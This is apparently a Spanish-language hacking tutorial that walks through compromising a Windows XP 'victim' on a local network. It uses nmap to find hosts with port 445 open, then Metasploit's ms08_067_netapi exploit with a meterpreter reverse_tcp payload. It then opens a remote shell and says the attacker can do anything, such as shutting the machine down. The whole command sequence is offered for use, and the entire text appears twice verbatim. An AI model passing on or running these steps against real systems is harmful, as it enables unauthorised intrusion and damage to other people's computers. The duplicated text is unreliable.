Un puerto TCP/IP abierto por defecto en el sistema operativo puede permitir a un usuario ingresar facilmente a su sistema si autorizacion nos puede llegar a consumir 100% de los recurso del equipo y dejar destrozos o hasta dejar fuera de funcionamiento
antes de empezar necesitamos un pc con backtrack y una victima que este usando Windows xp
lo primero que debemos hacer es saber nuestra ip para no confundirse
Ahora escaneamos nuestra red en búsqueda de alguna victima
#nmap -sP 192.168.1.1-255
lo siguiente tenemos que ver si nuestra victima tiene habilitado el puerto 445
#nmap -sS -sP 192.168.1.26
como lo tiene abilitado empezaremos hacer el trabajo de conexión con metasploit
#msfconsole
buscamos el exploit que usaremos
#search /windows/smb/ms
#use exploit/windows/smb/ms08_067_netapi
ahora hay que asignar la direccion de la victima y la nuestra
> set payload windows/meterpreter/reverse_tcp
> set rhost 192.168.1.26 (ip de victima)
> set lhost 192.168.1.28 (nuestra ip)
> exploit ------>ejecutamos el exploit
ahora escribimos shell para ingresar al cmd de nuestra victima
>shell
cd ..
cd ..
hicimos dos cd .. para quedar ubicados en el disco duro C:
hacemos un dir para saber que tiene en el disco duro
y hacemos lo que queramos ahora crear carpetas, apagar el equipo,etc
eso es todo
Vídeo de desmostracion
antes de empezar necesitamos un pc con backtrack y una victima que este usando Windows xp
lo primero que debemos hacer es saber nuestra ip para no confundirse
Ahora escaneamos nuestra red en búsqueda de alguna victima
#nmap -sP 192.168.1.1-255
lo siguiente tenemos que ver si nuestra victima tiene habilitado el puerto 445
#nmap -sS -sP 192.168.1.26
como lo tiene abilitado empezaremos hacer el trabajo de conexión con metasploit
#msfconsole
buscamos el exploit que usaremos
#search /windows/smb/ms
#use exploit/windows/smb/ms08_067_netapi
ahora hay que asignar la direccion de la victima y la nuestra
> set payload windows/meterpreter/reverse_tcp
> set rhost 192.168.1.26 (ip de victima)
> set lhost 192.168.1.28 (nuestra ip)
> exploit ------>ejecutamos el exploit
ahora escribimos shell para ingresar al cmd de nuestra victima
>shell
cd ..
cd ..
hicimos dos cd .. para quedar ubicados en el disco duro C:
hacemos un dir para saber que tiene en el disco duro
y hacemos lo que queramos ahora crear carpetas, apagar el equipo,etc
eso es todo
Vídeo de desmostracion